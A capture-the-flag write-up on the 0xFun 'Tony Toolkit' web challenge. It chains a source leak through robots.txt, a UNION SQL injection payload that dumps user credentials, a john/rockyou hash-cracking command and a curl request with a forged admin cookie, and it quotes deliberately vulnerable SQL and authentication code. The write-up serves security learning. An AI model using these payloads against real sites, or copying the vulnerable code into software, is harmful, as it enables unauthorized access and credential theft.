Tony Toolkit

0xFun CTFby smothy

Tony Toolkit - Web

Points: 250 | Difficulty: Medium | Flag: 0xfun{T0ny'5_T00ly4rd._1_H0p3_Y0u_H4d_Fun_SQL1ng,_H45H_Cr4ck1ng,_4nd_W1th_C00k13_M4n1pu74t10n} | Solved by: Smothy @ 0xN1umb

hacker gif

what we got

basic web app - "Tony's Tools" shop with a search function and login page. description says tony's running his first bug bounty so theres gonna be "common vulnerabilities" lmao

first thing i did was check robots.txt and holy shit:

User-agent: * Disallow: /main.pyi Disallow: /user Disallow: /secret/hints.txt

bro really just handed us the source code at /main.pyi

the solve

step 1: sqli go brrrr

looking at the source, the search endpoint is vulnerable af:

python
query = "SELECT name, price FROM Products WHERE name LIKE '%" + str(item) + "%';"

no parameterized queries lol classic

dumped the users table ez:

/search?item=' UNION SELECT username, password FROM Users--

got two users:

  • Admin - password is all zeros (placeholder prob)
  • Jerry - hash: 059a00192592d5444bc0caad7203f98b506332e2cf7abb35d684ea9bf7c18f08

step 2: crack that hash

hints.txt said "common passwords" and "hash cracking's a pain" so i threw it at john with rockyou:

bash
john --format=raw-sha256 --wordlist=/usr/share/wordlists/rockyou.txt jerry.hash

boom: 1qaz2wsx

ngl thats a keyboard pattern password lmaooo

step 3: cookie manipulation (the real bug)

logged in as Jerry and looked at the /user endpoint. the code does this:

python
def is_logged_in(request):
    cookie = request.cookies.get("user")
    # ... gets ALL users from DB
    for name, password in results:
        if sha256(f"{name}:{password}:{SECRET_LOGIN_TOKEN}").hexdigest():
            return True  # THIS ALWAYS RETURNS TRUE FOR ANY VALID USER HASH
    return False

wait... the is_logged_in function checks if the user cookie hash matches ANY user in the database, but it doesnt verify that the userID cookie actually belongs to that user!!

so the play is:

  1. login as Jerry (userID=2)
  2. keep Jerry's valid user cookie hash
  3. change userID cookie to 1 (Admin)
  4. profit
bash
curl -b "userID=1;user=0cea94be4ad3fc313cee0f65c3fd5dbc5dcf93d7e1bb337f2ecac06e52f29c28" \
     "http://chall.0xfun.org:38180/user"

cookie monster

IDOR go crazy

flag

0xfun{T0ny'5_T00ly4rd._1_H0p3_Y0u_H4d_Fun_SQL1ng,_H45H_Cr4ck1ng,_4nd_W1th_C00k13_M4n1pu74t10n}

fr tho this was a nice chain:

  • info disclosure (robots.txt + source leak)
  • sqli (dump creds)
  • hash cracking (weak password)
  • IDOR via cookie manipulation (broken auth check)

classic bug bounty stuff ngl, tony shouldve hired better devs

smothy out ✌️

Previous

Skyglyph Guide Star

Next

Webhook

More from 0xFun CTF

67

by smothy

Insanity1

by smothy

Insanity2

by smothy

Back to all writeups